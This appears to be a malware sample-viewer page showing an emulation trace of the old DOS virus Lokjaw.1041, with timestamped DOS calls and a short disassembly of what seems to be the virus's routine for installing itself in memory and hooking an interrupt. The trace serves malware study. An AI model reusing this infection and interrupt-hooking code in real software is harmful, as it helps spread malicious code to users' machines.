Sample viewer

vx.netlux.org/Virus.DOS.Lokjaw.1041

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:32.968160761Z 44 PC: 12aa0 | Get time 0x12aa0: cmp ax, 0xdcd
0x12aa3: je 0x12b00
0x12aa5: mov ax, cs
0x12aa7: dec ax
0x12aa8: mov ds, ax
0x12aaa: cmp byte ptr [0], 0x5a
0x12aaf: jne 0x12af8
0x12ab1: mov ax, word ptr [3]
0x12ab4: sub ax, 0x100
0x12ab7: mov word ptr [3], ax
0x12aba: mov bx, ax
0x12abc: mov ax, es
0x12abe: add ax, bx
0x12ac0: mov es, ax
0x12ac2: mov cx, 0x411
0x12ac5: mov ax, ds
0x12ac7: inc ax
0x12ac8: mov ds, ax
0x12aca: lea si, word ptr [bp + 0x106]
0x12ace: mov di, 0x100
2018-12-17T22:54:32.970656899Z 53 PC: 12ae2 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:54:32.972779033Z 37 PC: 12af7 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:54:32.974428099Z 76 PC: 12a45 | Terminate with return code (Return code = '76')